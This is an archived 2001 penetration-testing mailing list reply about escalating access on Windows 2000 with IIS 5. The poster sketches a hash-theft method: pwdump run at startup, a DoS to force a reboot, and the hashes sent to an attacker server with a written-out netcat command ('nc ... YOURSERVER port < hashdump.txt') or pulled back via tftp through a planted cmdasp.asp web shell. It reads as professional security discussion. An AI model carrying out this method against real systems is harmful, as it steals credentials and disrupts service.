Penetration Testing mailing list archives
Re: [PEN-TEST] Expand right under Win2K
From: Complx1 * <complx1 () HUSHMAIL COM>
Date: Wed, 10 Jan 2001 19:33:30 -0800
Apologies for my lack of attention to the questions title. Win2k, hk only works on NT 4.0 How about a theoretical untested scenario then. Assuming target is win2k , IIS v5. now depending on FAT vs NTFS and firewall ACL conditions.. something along the lines of this might be possible.. Assuming DoS conditions are permitted in the test, what are thoughts on , wrapping a payload package of pwdump, netcat, and a batch file. Write a small batch that dumps the hash to a text file, then nc -v YOURSERVER port < hashdump.txt put the payload in the startup method of your choice, or perhaps work it into a triggered mechanism (but then unicode wouldnt do well for that, only the primary intrusion) . DoS the box, notify the admin to reboot, open your netcat listener, when the box comes back up, maybe a hash will be dumped into your netcat port =) then let the cpu cycles roll. ive tested this method several times on a LAN with success. no unicode however, only registry methods and the like. so cant say how a remote test would turn out. last minute thought.. if you made the pwdump execute on startup and let it reside on the disk.. you could trigger the hash file retrieval at will, for instance, maybe you left your cmdasp.asp there and now the box has been DoS'd, tftp the results of the file to yourself. .complx`1 At Wed, 10 Jan 2001 20:26:45 +0100, Tamas Foldi <geza () KAPU HU> wrote:
3. HK doesn't work under win2k (it produced permission denied message) win2k never has been vulnarable to spoofed LPC port requests
Current thread:
- Re: [PEN-TEST] Expand right under Win2K, (continued)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Tamas Foldi (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Julian Linton (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Pascal C. Kocher (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Nelson (Jan 11)